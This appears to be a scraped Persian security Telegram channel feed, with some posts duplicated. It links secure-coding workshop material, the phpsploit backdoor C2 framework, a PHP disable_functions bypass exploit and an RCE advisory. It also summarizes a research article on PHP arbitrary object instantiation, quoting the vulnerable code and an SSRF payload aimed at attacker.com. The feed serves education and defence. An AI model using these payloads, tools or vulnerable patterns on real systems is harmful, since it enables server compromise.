چندتا از دوستان منابعی درمورد برنامه نویسی امن نیاز داشتن بهشون گفتم در کانال درج میکنم استفاده کنید :
اسلاید و کتابچه کارگاه کد نویسی امن آپای دانشگاه محقق اردبیلی
CPP Slide : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/Secure_c++_(2).pdf
PHP Slide : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/php[edited].pdf
PHP handbook : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_php.pdf
CPP :https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_c++.pdf
.Net : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_dotnet.pdf
Andriod : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_android.pdf
🆔 @securation
#secure_coding #security
#cpp #Android #dotnet #php
🆔 @securation
اسلاید و کتابچه کارگاه کد نویسی امن آپای دانشگاه محقق اردبیلی
CPP Slide : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/Secure_c++_(2).pdf
PHP Slide : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/php[edited].pdf
PHP handbook : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_php.pdf
CPP :https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_c++.pdf
.Net : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_dotnet.pdf
Andriod : https://cert.uma.ac.ir/filemanager/userfiles/news/Files/secure_coding_android.pdf
🆔 @securation
#secure_coding #security
#cpp #Android #dotnet #php
🆔 @securation
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner
https://github.com/nil0x42/phpsploit
#php #c2 #shell #backdor
@securation
webserver via polymorphic PHP oneliner
https://github.com/nil0x42/phpsploit
#php #c2 #shell #backdor
@securation
GitHub
GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor
Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoor - nil0x42/phpsploit
⭕️ PHP 7.3-8.1 disable_functions bypass using string concatenation
PHP 7.3-8.1 disable_functions bypass [concat_function]This exploit uses a bug in a function that handles string concatenation.
A statement such as $a.$b might result in memory corruption if certain conditions are met.
The bugreport provides a very thorough analysis of the vulnerability.
The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.
https://github.com/mm0r1/exploits/tree/master/php-concat-bypass
#PHP #bypass #disable_functions
@securation
PHP 7.3-8.1 disable_functions bypass [concat_function]This exploit uses a bug in a function that handles string concatenation.
A statement such as $a.$b might result in memory corruption if certain conditions are met.
The bugreport provides a very thorough analysis of the vulnerability.
The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.
https://github.com/mm0r1/exploits/tree/master/php-concat-bypass
#PHP #bypass #disable_functions
@securation
🔥2
⭕️Critical Vulnerabilities in PHP Everywhere Allow Remote Code Execution
https://www.wordfence.com/blog/2022/02/critical-vulnerabilities-in-php-everywhere-allow-remote-code-execution/
#PHP #RCE
@securation
https://www.wordfence.com/blog/2022/02/critical-vulnerabilities-in-php-everywhere-allow-remote-code-execution/
#PHP #RCE
@securation
Wordfence
Critical Vulnerabilities in PHP Everywhere Allow Remote Code Execution
On January 4, 2022, the Wordfence Threat Intelligence team began the responsible disclosure process for several Remote Code Execution vulnerabilities in PHP Everywhere, a WordPress plugin installed on over 30,000 websites. One of these vulnerabilities allowed…
👍1
⭕️ Exploiting Arbitrary Object Instantiations in PHP without Custom Classes
PHP’s Arbitrary Object Instantiation:
این مورد یک آسیب پذیری هست که به حمله کننده اجازه ساختن object های دلخواهش رو در PHP میده.
کد آسیب پذیر در مقاله به طور خلاصه به صورت زیر هست
تعدادی از فایل های اپلیکیشن امکان دسترسی برای کاربران بدون احراز هویت رو داشتن که در یکی از این فایل ها ، محقق متوجه میشه که ۲ پارامتر به نام های module و HelpNumber از کاربر گرفته میشن که در نهایت به صورت زیر instantiate میشن
1. Exploiting SSRF + Phar deserialization
2. Exploiting through PDOs
3. Exploiting through the Imagick Extension
برای مثال در اکسپلویت SSRF + Phar deserialization محقق به ترکیب زیر میرسه
لینک کامل این مقاله:
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
#PHP #Web
@securation
PHP’s Arbitrary Object Instantiation:
این مورد یک آسیب پذیری هست که به حمله کننده اجازه ساختن object های دلخواهش رو در PHP میده.
کد آسیب پذیر در مقاله به طور خلاصه به صورت زیر هست
new $_GET['a']($_GET['b']);
حمله کننده اپلیکیشن آسیب پذیر رو در یک پروسه تست نفوذ داخلی پیدا میکنه. ابتدا در یک پروسه تست نفوذ داخلی یک سرویس LDAP پیدا میکنه که دسترسی بهش از طریق anonymous user امکان پذیر نبوده. بعدش با ست کردن کانفیگ زیر در فایل etc/hosts/ اش قادر به دور زدن پروسه احرازهویت میشه به دلیل اینکه سرویس LDAP با چک کردن TLS SNI احراز هویت رو انجام میداده10.0.0.1 company.com
سپس حمله کننده اپلیکیشن PHP ای پیدا میکنه که از LAM یا LDAP Account Manager استفاده میکرده و سپس اقدام به خوندن سورس کد میکنه.تعدادی از فایل های اپلیکیشن امکان دسترسی برای کاربران بدون احراز هویت رو داشتن که در یکی از این فایل ها ، محقق متوجه میشه که ۲ پارامتر به نام های module و HelpNumber از کاربر گرفته میشن که در نهایت به صورت زیر instantiate میشن
new $_GET['module']($_GET['HelpNumber']);
و اقدام به اکسپلویت کردن این آسیب پذیری به روش های مختلف میکنه: 1. Exploiting SSRF + Phar deserialization
2. Exploiting through PDOs
3. Exploiting through the Imagick Extension
برای مثال در اکسپلویت SSRF + Phar deserialization محقق به ترکیب زیر میرسه
new SplFileObject('https://attacker.com/');
از طریق کلاس SplFileObject امکان برقراری ارتباط به هر هاست لوکال یا ریموت وجود داره. که این امکان SSRF رو به ما میده و ذکر میکنه که در PHP ورژن های 8 به پایین امکان تبدیل کردن این SSRF به deserializations از طریق Phar protocol وجود داره.لینک کامل این مقاله:
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
#PHP #Web
@securation
GitHub
GitHub - LDAPAccountManager/lam: LDAP Account Manager
LDAP Account Manager. Contribute to LDAPAccountManager/lam development by creating an account on GitHub.
👍10👎2